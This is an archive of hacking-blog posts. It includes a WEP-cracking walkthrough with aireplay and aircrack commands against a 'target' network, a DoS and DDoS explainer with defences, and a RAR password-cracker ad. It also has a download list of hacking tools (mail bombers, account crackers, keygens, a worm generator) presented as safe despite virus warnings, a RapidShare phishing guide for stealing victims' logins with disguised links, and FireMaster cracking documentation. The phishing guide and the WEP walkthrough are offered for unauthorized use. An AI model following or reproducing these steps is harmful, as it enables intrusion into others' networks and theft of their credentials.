Thursday, January 13, 2011

Gmail Phishing interesting


Friday, January 16, 2009

Crack WEP Tutorial WEP cracking [In 10mins]

More Cracking WEP GUIDES and Information From
Ok, this is a tutorial explaining how to crack most WEP encrypted Access Points out there. The tools used will be as follows:
Kismet (any working version)
>= Aireplay 2.2 beta
>= Aircrack 2.1
As for wireless cards, i recommend any Prism , Orinoco , or Atheros based cards (i used the D-Link 650 Rev.1a).

Getting Started:
Let's see, First thing you are going to want to do is charge your lappy to the top (aireplay and aircrack drain the battery quite a bit) Next you are going to want to load up your favourite live CD (i used Whoppix 2.7 final) or Linux OS, then stumble across a encrypted WLAN, use Kismet to do so. Make sure you have configured your kismet .conf file correctly to be able to use your card (locate your kismet.conf file and open with your favourite text editor, i used pico);


# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.

^^ that is an example of part of my kismet.conf, initially that was wrong for me, i had to comment out the first line and uncomment the second (my wireless device name was wlan0, you can find this out by typing 'iwconfig' in a terminal).
Note: To find your cards chipset have a good google on the model number of your card or try checking here . A full list of supported chipsets can
be found on the Kismet website under Documentation.
Changed kismet.conf:


# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.

Save the changes you make and go back to a terminal and run 'kismet', it should load up if you configd it properly. Once you have got kismet going, have a good stumble around your area, to see if a WLAN has WEP enabled, kismet should have a column near the ESSID titled with 'W' if it has WEP enabled it will have a Y, if not it will be a N.
Going in for the kill:
So now you got a target you are going to make sure you dont look suspicious and you got at least 15mins worth of battery life left Razz. Making sure you know the channel the Access Point is on (under the CH cloumn in kismet) and also the mac address of the Access Point by hiting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected.
First off you are going to want to set your wireless card to the right mode, depending on what chipset depends on what commands you have got to use:


If you use madwifi, you may have to place the card in
pure 802.11b mode first:
iwpriv ath0 mode 2
If you use wlan-ng, run
./ start wlan0 [comes with AirePlay2.2]
Otherwise run:
iwconfig ath0 mode Monitor channel
ifconfig ath0 up

Read the AirePlay2.2 readme for more info.
Start by opening up another terminal window and cd into your aircrack directory and launch airodump:
[version crap]
usage: ./airodump [mac filter]
./airodump wlan0 linksys
The mac filter is used when you have more than one Access point on the same channel at once, so say you have 'jim_home' and 'linksys' both essid's of access points both on channel 11 you would grab the mac address of of the Access Point in kismet, by hiting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected. Ok so now you have got a stream of packets from your target, you see the IV column, those are whats known as 'weak key' packets, we want as many of them as we can get (400k+ is a nice number Razz). Now we are going to capture a 'weak key' packet from on the network we are targeting and going to flood the Access Point with it in hope that we get lots of 'weak key' replies sent out so we can eventually crack the password. So now in your other terminal window 'cd' into your aireplay directory and execute aireplay ('./aireplay'[return]):


capture packets unless interface #1 is specified.
source options:
-i : capture packet on-the-fly (default)
-r file : extract packet from this pcap file
filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length, default: 40
-n len : maximum packet length, default: 512
-u type : fc, type - default: 2 = data
-v subt : fc, subtype - default: 0 = normal
-t tods : fc, To DS bit - default: any
-f fromds : fc, From DS bit - default: any
-w iswep : fc, WEP bit - default: 1
-y : don't ask questions, assume yes
replay options:
-x nbpps : number of packets per second
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-o fc0 : set frame control[0] (hex)
-p fc1 : set frame control[1] (hex)
-k : turn chopchop attack on

./aireplay -b 00:FF:00:FF:00:FF -x 512 wlan0
Here we are going to grab a few packets from the Access Point with the MAC address 00:FF:00:FF:00:FF until we catch a 'weak key' packet which then aireplay will ask you if you want to use to then flood the Access Point with that packet. when it asks you if it can use one of the packets hit 'y' then return. If you flick back to your terminal with airodump running you should see the packets being captured will increase by a huge amount and with that the IV packets should also be increasing pretty damn fast aswell, if all went well in about 10mins you should have enough packets to then dump into aircrack. Ok so you want at least 400k+ IV packets (the more the better), once you got a decent amount hit 'control+c' in both terminal windows to terminate both aireplay and airodump, now 'cd' into your aircrack directory and run aircrack ('./aircrack'[return]):


aircrack 2.1 - (C) 2004 Christophe Devine
usage: ./aircrack [options] ...
-d : debug - specify beginning of the key
-f : bruteforce fudge factor (default: 2)
-m : MAC address to filter usable packets
-n : WEP key length: 64 / 128 / 256 / 512
-p : SMP support: # of processes to start
-q : Quiet mode (less print more speed)

./aircrack -n 128 linksys.cap
what i did there was set aircrack to read my packet file called linksys.cap (what airodump creates) and telling aircrack it was a 128 bit encryption. If all goes well you will get the key in nice red text.
KEY FOUND: [ Pwn3d ]
Happy WarDriving.
(Please reply with any errors in my tutorial

Wednesday, December 17, 2008

Denial-Of-Services Attack - Detailed Explanation

Demystifying Denial-Of-Service attacks, part one By Admin @ Techmaifas. This paper provides an introduction to Denial of Service (DoS) attacks, their methodologies, common prevention techniques, and how they differ from Distributed Denial of Service (DDoS) Attacks. This article is intended to be a broad overview for the beginner or intermediate-level administrator on the different types of DoS attacks.

1. Definitions

We begin by defining Denial of Service and Distributed Denial of Service.

1.1 What is a DoS?

As the name implies, DoS is a Denial of Service to a victim trying to access a resource. In many cases it can be safey said that the attack requires a protocol flaw as well as some kind of network amplification.

Denial of Services is also an attack on a computer system or network that causes a loss of service to users, typically the loss of network connectivity and services through the the consumption of bandwidth of the victim network, or the overloading the computational resources of the victim system. (see the Wikipedia definition)

The motivation for DoS attacks is not to break into a system. Instead, it is to deny the legitimate use of the system or network to others who need its services. One can say that this will typically happen through one of the following means:

1. Crashing the system.
2. Deny communication between systems.
3. Bring the network or the system down or have it operate at a reduced speed which affects productivity.
4. Hang the system, which is more dangerous than crashing since there is no automatic reboot. Productivity can be disrupted indefinitely.

DoS attacks can also be major components of other type of attacks.

1.2 What is a Distributed DoS?

A Distributed DoS (DDoS) is the combined effort of several machines to bring down victim. In many cases there is a master machine that launches the attack to zombie machines that are part of a bot network, as shown below in Figure 1. Some bot networks contain many thousands of machines used to launch an attack.

With DoS and DDos defined, we'll now take a look at attacks that affect the consumption of resources, such as Smurf attacks, and then address attacks like SYN Flood that affect network connectivity.

Note that the consumption of resources is most evident when it involves the exploitation of bandwidth, CPU usage, memory, disk space, or access to other computers and resources.

2. Bandwidth exhaustion attacks

A bandwidth exhaustion attack is where an attacker tries to consume the available bandwidth of a network by sending a flood of packets. This is most often accomplished with the help of several other machines. There is soon a flood of malicious nonsense packets on the network in large quantity, whereby the chances of survival of any good, legitimate packets becomes remote. Eventually the network becomes choked with these packets, and the network is effectively cutoff from the Internet and services are denied.

An ideal example of a bandwidth exhaustion attack would be Smurf attacks. Consider a scenario with an ISP and three clients, as shown below in Figure 2. In this scenario, the ISP receives extensive traffic for client 2 on its backbone. Since the connection to client 2 is of limited capacity and smaller than the ISP's backbone, it can't push all the data received for client 2 through the link to client 2. Therefore it will start to drop packets, and the TCP connections will lead to retransmissions of the lost/dropped packets. There will be a time when a legitimate host wants to connect to Client 2's network, but this will timeout and hence a DoS will occur.

2.1 Smurf Attack

Named after a popular program which generates this attack, an ICMP echo request is sent to a broadcast network address (acting as an amplifying agent) with the source address of the victim spoofed. This results in a storm of replies from that network which, if large enough, has the power to take the victim's network down. It is to be noted that there is not much a victim can do about this attack since the link is simply overloaded with packets.

There are always three parts of a Smurf Attack:

1. Attacker
2. Amplifier - a router
3. Victim

This attack succeeds because the amplifier is misconfugred to forward the directed broadcasts.

Suppose the address range to is assigned to a company which has an amplifier, and an attacker sends packets with destination All the routers and systems from attacker to the amplifier will not see the difference between this IP and (an IP from the range). The packet reaches the amplifier and the amplifier notices that this is the broadcast address, so it forwards the request to all the systems on the network/subnet. This is known as directed broadcast.

The two crucial components of this attack were:

1. A misconfigured router forwarding the broadcast request to the subnet.
2. Machines that will respond to this ICMP broadcast request.

Going deeper we can see that the amplifier also makes itself and its network a victim of this attack.

Victims are typically chosen by attackers from IRC where bots (automated programs) are kept to look for the address of victims. Hackers often exchange the information about amplifiers with each other so when a mass attack takes palce it usually appears to come from all over the globe.

Powertech provides realtime statistics of the top amplifiers currently on the Internet.

Below is a typical depiction of the dumps at the Victim. These are ICMP Echo replies received at the Victim's end. Then Figure 3 provides an overview of a Smurf attack.

10:10:17.100000   > victim:  icmp: echo reply 10:10:18.300000 > victim:  icmp: echo reply 10:10:18.310000 > victim:  icmp: echo reply 10:10:19.110000 > victim:  icmp: echo reply 10:11:09.190000 > victim:  icmp: echo reply 10:11:09.240000 > victim:  icmp: echo reply 10:11:10.110000 > victim:  icmp: echo reply 10:11:10.600000 > victim:  icmp: echo reply 10:11:10.790000 > victim:  icmp: echo reply

2.2 How to protect against Smurf attacks

Step 1. Amplifier Configuration. The router should be configured so that it does not forward directed broadcasts onto networks. It is important to note that the broadcast has to be disabled on all the routers and not merely just the external ones. Command "no ip directed-broadcast" on Cisco routers should do the job in most cases. This will also ensure that employees on the internal network won't be able to launch Smurf attacks. However it is also advisable that one has a filtering device (such as a firewall) on the perimeter, thereby providing an extra layer of security.

Step 2. Configure the server operating systems. Servers should be configured so that they will not respond to a directed broadcast request. FreeBSD is one such system which by default does not respond to this request. Other systems can be similarly configured, and this will be discussed in the next section.

Step 3. Victim issues. As mentioned earlier, not much can be done at the victim's end and damage will be done unless victim's ISP takes some actions to block these ICMP Echo Reply floods. Even if the victim's parameter router denies the ICMP Echo Reply, the link from the ISP to the victim's site will suffer.
2.3 ICMP Ping Flood attacks

Ping Floods are where an attacker floods the victim's network with large number of ICMP Echo Requests - such as by flooding the network as fast as possible. In this scenario, filtering the incoming packets might help, however, if the victim is on a modem instead of a high-speed connection, nothing can be done. However the catch in this attack is that if not done properly the attacker can also be counter-attacked, so he needs to be on a faster network than the victim. In most cases, mitigating this attack involves isolating spoofed IPs. This attack is easy to peform since there are many tools on Internet and little knowledge is required to execute a ping flood.
2.4 Fraggle attacks

A Fraggle attack is a Smurf variant that uses UDP instead of ICMP. In this case, the ports echo, chargen, daytime, qotd are used to trigger responses. These ports are also susceptible to a pingpong attack, and therefore these serves should be turned off or blocked.

3. Network connectivity attacks

These attacks overload the victim so that its TCP/IP stack is not able to handle any further conections, and processing queues are completely full with nonsense malicious packets. As a consequence of this attack, legitimate connections are denied. One classic example of a network connectivity attack is a SYN Flood.
3.1 Example: SYN Flood attacks

A SYN Flood is where an attacker sends packets with a spoofed source IP Address and a TCP SYN Flag set to the server (victim). Let's first assume that the attacker knows which ports are open on the server. Since the source IP is spoofed, the response sent to the SYN packet by the server will never receive a reply back. The server will keep waiting until it times out. If this happens for a very large number of connections the result will be a DoS, since the server won't be available for any legitimate connections and its resources will be choked.

As will be shown, this attack exploits a vulnerability of the TCP protocol, by the way in which the TCP three-way connection is established. This is shown below in Figure 4.

3.2 Protecting against SYN Flood attacks

There are several things that can be done to protect against SYN Flood attacks.

1. Decrease the TCP Connection Timeout on the victim server.
2. Use a filtering device, like a firewall, at the perimeter which works as an intermediary in forwarding the connections to the server.
Use of a server farm: this can also help in fighting the SYN Flood since you will have number of the servers to answer the request, but this also has limitations and overhead considerations.

A detailed article on SYN Flood protection by Mariusz Burdach was previously published on SecurityFocus. Therefore, only a short overview of SYN Flood protection will be discussed in this section.
3.2.1 Protecting Microsoft Windows from a SYN Flood attack

Microsoft Windows has a mechanism to detect and start SYN Flood protection. The SYN flooding attack protection feature detects symptoms of SYN flooding and responds by reducing the time the server spends on connection requests that it cannot acknowledge.

Specifically, TCP shortens the required interval between SYN-ACK (connection request acknowledgements) retransmissions. TCP retransmits SYN-ACKS when they are not answered. As a result, the allotted number of retransmissions is consumed more quickly and the unacknowledgeable connection request is discarded faster.

When enabled, the system monitors the connections maintained by TCP and starts the SYN attack flooding protection when the any of the following conditions, symptomatic of SYN flooding, are found:

* The total number of connections in the half-open (SYN-RCVD) state exceeds the value of TcpMaxHalfOpen
* The number of connections that remain in the half-open (SYN-RCVD) state even after a connection request has been retransmitted exceeds the value of TcpMaxHalfOpenRetried
* The number of connection requests the system refuses exceeds the value of TcpMaxPortsExhausted. The system must refuse all connection requests when its reserve of open connection ports runs out.

Microsoft suggests the following registry settings:

hkey_local_machine \system \currentcontrolset \services  \tcpip \parameters \synattackprotect=1 REG_DWORD   hkey_local_machine \system \currentcontrolset \services \tcpip  \parameters \tcpmaxconnectresponseretransmissions=2 REG_DWORD   hkey_local_machine \system \currentcontrolset \services \tcpip  \parameters \tcpmaxdataretransmissions=3 REG_DWORD
3.2.2 Check Point protections against a SYN Flood attack

In the first scenario, we look at Check Point as a simple proxy to the victim server. This is shown below in Figure 5.

In this scenario Check Point acts a proxy to the server and responds to all the requests sent to the server. A request is forwarded to the server only if there is a corresponding ACK. The drawback of this configuration is that normally a perimeter firewall is very heavily loaded and this configuration will induce further load on it. The advantage is that the server will always be free to only take legitimate connections.

In the second scenario, we look at Check Point preventing a SYN Flood attack while residing in a transparent proxy configuration. This is shown below in Figure 6.

Here Check Point passes all the connections, irrespective of whether they are legitimate or not, to the server but also starts a timer once it sees a ACK/SYN from the server. If there is no corresponding ACK from the Client and the timer expires, the firewall will send a RST to the server thereby preventing its queue from overflowing with illegitimate connections. The advantage of this configuration is that load on firewall is reduced considerably as compared to previous configuration. The drawback, however, is that now the server sees all the connection attempts.

4. Conclusion

In this article we've defined DoS and DDoS and looked at attacks that affect the consumption of bandwidth: Smurf attacks, ICMP ping floods, and Fraggle attacks. We've also taken a first look at attacks that affect network connectivity, such as SYN Flood attacks and some of the ways to prevent them.

Next time in part two, we'll look at the consumption of other precious resources such as CPU time, disk space, memory utilization, and then examine any vulnerable printers that may be DoS attack vectors on the network. We'll also discuss Teardrop attacks, LAND attacks, Ping-of-death, and finally discuss some common Win32 worms that have been used to build botnets that perform broad DDoS attacks. Finally, we'll discuss mitigation techniques and best practices for preventing DoS attacks. Stay tuned.

WinRar Password Remover

RAR Password Recovery is a powerful tool to recover lost (forgotten) passwords for a RAR/WinRAR (2.xx and 3.xx) archives. The program supports the "brute-force" attack, dictionary-based attack and dramatically fastest "Booost-Up" attack. The program is able to resume the previous interrupted attack..

Here is a brief list of RAR Password Recovery advantages:

Recovers passwords for a RAR/WinRAR archives of versions 2.xx and 3.xx using combination of Brute-Force, Booost-Up or Dictionary attacks.
Very high speed of work (more than 3000 passwords per second in Brute-Force mode and up to 22000 passwords per second in Booost-Up mode).
Advanced heuristic processor.
User-friendly interface.
Large wordlist dictionary.
Ability to work in the background.
Autosave feature.

USerful Hack Tools {Best of 2008}

This download would be detected as virus, but dont worry all of the tools have malicious code which will help you to hack. But it wont do anything wrong to your computer.

What does it have?
AOL new.rar
Astaroth Joiner v2.rar
Cable Modem Sniffer.rar
CGI Founder
DDL Sites.rar
E-mail Cracker.rar
F.B.I - Binder.rar
FTP Brute Forcer.rar
~Censored~ Mail Bomber 2.3.rar
Hack MY
Hack Photoshop
Hook Tool Box.rar
Hotmail Email Hacker.rar
Hotmail HAcker Gold.rar
Key Changer.rar
Legion NetBios Scanner
Mail Boomb_2.0
MooreR Port Scanner.rar
MSN Flooder 2.0.rar
MSN Messenger Account Cracker v2.0.rar
NET BIOS Scaner.rar
NetBIOS Name Scanner.rar
NFO Maker
On-Off MSN.rar
OS Update Hack.rar
P0kes WormGen
Php Nuke Hacker v11.0.rar
phpBB Annihilator.rar
phpbb attack.rar
phpbb bruteforcer.rar
PhpBB pass
Ping & Nukes.rar
Port Listener XP.rar
Pure phpBB Email harvester.rar
Remote Shut Down.rar
Server 2003 Keygen.rar
Server Killer.rar
Source Checker.rar
source codes.rar
SQLScan v1.0.rar
Stealth - HTTP Scanner v1.0 build
UC.Forum Spam.rar
Warez Sites.rar
Web Cracker 2.0.rar
WebCracker 4.0.rar
Win XP Activator.rar
Windows XP Corperate Keygen.rar
Windows XP KeyGen.rar
Windows XP Product Key Changer.rar
Windows XP Product Key Checker.rar
Windows XP Product Key Viewer.rar

RapidShare Hacking

U must have noticed many rapidshare account posted on the site... i have got many members asking me how i did it.... so heres the way... enjoy phishing... please remember to share them on the website as we cant change the password.... only owner of the account can change the pass.

1. You will need to have the phishing files which u can download from

2. Once you download these files u will need to upload them to a webhost so everyone can see that here are some list of free webhosts...

Code: or any other u know

3. Now upload all of the files to your webhost.

4. Now one of the files in the download would be "config.php" which will need to edit. So open that file with notepad.

5. Find this text in that file
PHP Code:
$website ""//Full Path To Install
$phishingnet="yourPhisherpasswords.txt" //Textfile Where To Store The Accounts
6. Just make appropriate changes to this code as per the webhost name and the folder where you have uploaded the phishing files.

7. Now here goes the format of the link which u can give to the victim in order to steal their password.

8. Now you're all set... just give this phishing link to the victim which will exactly look like the rapidshare page and even he will download the file whicheva u give the link for... but the only difference would be username and password would be send to you as well

Additional Tips:-

As you know now you would have long URL's which looks suspicious to advanced users, so what u can do is u can try to shorten the URL with some free websites... here are some examples.

So enjoy RapidShare hacking...

Saturday, December 13, 2008

FireMaster The Firefox Master Password Recovery Too

Version 3.1: 28th Sep 2008
Fixed the bug in recovering the master password for Iceweasel which is browser derived from Firefox.
Version 3.0: 29th July 2008
Support for Firefox version 3.0, now you can recover the master password of latest version of Firefox. The differences in reading the Firefox key database file is resolved.
Kudos to the Firefox crew for yet another beautiful version of Firefox...!
Version 2.5:  22nd March 2008
Pattern based brute force password recovery method is implemented which reduces the time considerably when certain part of the password is already known. Also minimum length of password can be specified which improves the recovery time greatly.  
Usage is simplified by forcing one crack method at a time and providing better meaningful options. Fixed the bug in displaying statistics and now it displays the remaining time accurately based on the current speed which is computed dynamically.
Thanks for your suggestions and feedbacks...
Version 2.2:  8th July 2006
FireMaster source code is released under GPL v2.
Version 2.1:  18th June 2006
Tested successfully with latest version of Firefox.
Statistics display during the operation is improved.
Version 2.0:  25th Feb 2006
First public release of FireMaster SOURCE code.
Now it works at amazing speed of 50k passwords per second on normal m/c.
Firefox library dependency is removed completely.
For brute force, speed and time is displayed during operation.
Lots of optimizations and few bug fixes.
Thanks to 'T Barton' for reporting the bug with 1.5 version.
Version 1.5:  14th Jan 2006
Bug in parsing key3.db fixed.
Displaying results during recovery operation.
Speed is doubled compared to the original version.
Version 1.0:  1st Jan 2006
First public release of FireMaster.
About FireMaster
Firemaster is the Firefox master password recovery tool. Firefox uses master password to protect the stored sign-on information for various websites. If the master password is forgotten, then there is no way to recover the master password and user has to lose all the sign-on information stored in it. To prevent this problem, I have developed FireMaster which uses combination of techniques such as dictionary, hybrid and brute force to recover the master password from the Firefox key database file.
About Firefox Password Manager and Master Password
Firefox comes with built-in password manager tool which remembers username and passwords for all the websites you visit. This sign-on information is stored in the encrypted form in Firefox database files residing in user's profile directory. However any body can just launch the password manager from the Firefox browser and view the credentials. Also one can just copy these database files to different machine and view it offline using the tools such as FirePassword.
Hence to protect from such threats, Firefox uses master password to provide enhanced security. By default Firefox does not set the master password. However once you have set the master password, you need to provide it every time to view sign-on credentials.So if you have lost the master password, then you have lost all the stored credentials as well.
So far there was no way to recover these credentials once you have lost the master password. Now the FireMaster can help you to recover the master password and get back all the sign-on information.
Internals of FireMaster
Once you have lost master password, there is no way to recover it as it is not stored at all. Whenever user enters the master password, Firefox uses it to decrypt the encrypted data associated with the known string. If the decrypted data matches this known string then the entered password is correct. FireMaster uses the similar technique to check for the master password, but in more optimized way. The entire operation goes like this.
  • FireMaster generates passwords on the fly through various methods.
  • Then it computes the hash of the password using known algorithm.
  • Next this password hash is used to decrypt the encrypted data for known plain text (i.e. "password-check").
  • Now if the decrypted string matches with the known plain text (i.e. "password-check") then the generated password is the master password.
Firefox stores the details about encrypted string, salt, algorithm and version information in key database file key3.db in the user's profile directory. You can just copy this key3.db file to different directory and specify the corresponding path to FireMaster. You can also copy this key3.db to any other high end machine for faster recovery operation.
FireMaster supports following password generation methods

1) Dictionary Method
In this mode, FireMaster uses dictionary file having each word on separate line to perform the operation. You can find lot of online dictionary with different sizes and pass it on to Firemaster. This method is more quicker and can find out common passwords.
2) Hybrid Method
This is advanced dictionary method, in which each word in the dictionary file is prefixed or suffixed with generated word from known character list. This can find out password like pass123, 12test, test34 etc. From the specified character list (such as 123), all combinations of strings are generated and appended or prefixed to the dictionary word based on user settings.
3) Brute Force Method
In this method, all possible combinations of words from given character list is generated and then subjected to cracking process. This may take long time depending upon the number of characters and position count specified.
How to use FireMaster?
First you need to copy the key3.db file to temporary directory. Later you have to specify this directory path for FireMaster as a last argument.

Here is the general usage information

Firemaster [-q] 
           [-d -f
           [-h -f -n -g "charlist" [ -s | -p ] ]
           [-b -m -l -c "charlist" -p "pattern" ]

Dictionary Crack Options:
   -dPerform dictionary crack
   -fDictionary file with words on each line
Hybrid Crack Options:
   -hPerform hybrid crack operation using dictionary passwords.
Hybrid crack can find passwords like pass123, 123pass etc
   -fDictionary file with words on each line
   -gGroup of characters used for generating the strings
   -nMaximum length of strings to be generated using above character list
These strings are added to the dictionary word to form the password
   -sSuffix the generated characters to the dictionary word(pass123)
   -pPrefix the generated characters to the dictionary word(123pass)
Brute Force Crack Options:
   -bPerform brute force crack
   -cCharacter list used for brute force cracking process
   -m[Optional] Specify the minimum length of password
   -lSpecify the maximum length of password
   -p [Optional] Specify the pattern for the password
Sample Usage Information
// Dictionary Crack
FireMaster.exe -d -f c:\dictfile.txt Firefox_Profile_Path
// Hybrid Crack
FireMaster.exe -h -f c:\dictfile.txt -n 3 -g "123" -s Firefox_Profile_Path
 // Brute Force Crack
FireMaster.exe -q -b -m 3 -c "abyz126" -l 10 -p "pa??f??123" Firefox_Profile_Path
Here Firefox_Profile_Path refers to the directory where key3.db file is present. This points to the Firefox profile directory (Ex: C:\Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\) on your machine. However you can also copy key3.db file from any other machine such as Linux system to your local windows machine and specify that path during recovering operation.
Quiet mode ( -q option ) will disable printing each password while recovery is in progress. This makes it much faster especially for brute force operation. However during brute force operation if the password count exceeds 50000 passwords then it automatically enters the quiet mode.
Hybrid method tries normal dictionary password as well as password created by appending/prefixing the generated strings to the dictionary word. For example if the dictionary word is "test" and you have specified character set as '123' (-c 123 -s) then the new passwords will be test1, test12, test123, test32 etc.
Character list (-g for hybrid and -c for brute force) specifies the characters to be used for generating passwords. If you don't specify then the default character list is used. For brute force -m indicates the minimum length of password to be generated. This can reduce the generated passwords and hence the time considerably when large number of character set is specified. Similarly -l (small 'L') specifies the maximum length of password to be generated. For example, if you specify -m 6 and -l 8 then only passwords which are of length at least 6 and above but below 8 will be generated. 

Now you can reduce the password cracking time significantly using pattern based password recovery mechanism. If you know that password is of certain length and also remember few characters then you can specify that pattern for brute force cracking. For example, assume that you have set the master password of length 12 and it begins with 'fire' and ends with '123' then command will look like below
FireMaster.exe -b -c "abyz" -l 12 -p "fire?????123" c:\testpath
This will reduce the time to seconds which otherwise would have taken days or hours to crack that password. You can even crack the impossible looking passwords using the right pattern.
FireMaster in Action
Firemaster in Action
FireMaster and FireFox
FireMaster is tested with latest Firefox version 3.0 and should work with any Firefox having version 1.0 or more.

If the FireMaster failed to work with your Firefox then please send me the key3.db and cert8.db (required for older versions) files which are present in your Firefox profile directory. Note that sign-on credentials are stored in the signons.txt file and key3.db just contains the master password related information. So even if some one knows your master password it will be useless unless he/she has access to signons.txt file.
FireMaster is designed with good intention to recover the lost master password so that every one keep enjoying their experience with Firefox. Like any other tool its use either good or bad, depends upon the user who uses it. However author is not responsible for damages or impact caused due to misuse of FireMaster.
Thanks to the Mozilla-Firefox crew for making such an excellent, beautiful, free browser.

Thanks to everyone who shared their experience with FireMaster and sending the valuable feedbacks and suggestions.
Download FireMaster
If you want to build the FireMaster from the source then you need to download the Gecko SDK from Mozilla website. 

FireMaster 3.1 binary & source download
See Also
   Using FireMaster with pattern based recovery technique 
   FirePassword: The Firefox Username & Password List Decryptor
   NetShareMonitor: Monitor your shares from intruders.
   Recover Windows password in seconds using Rainbow crack.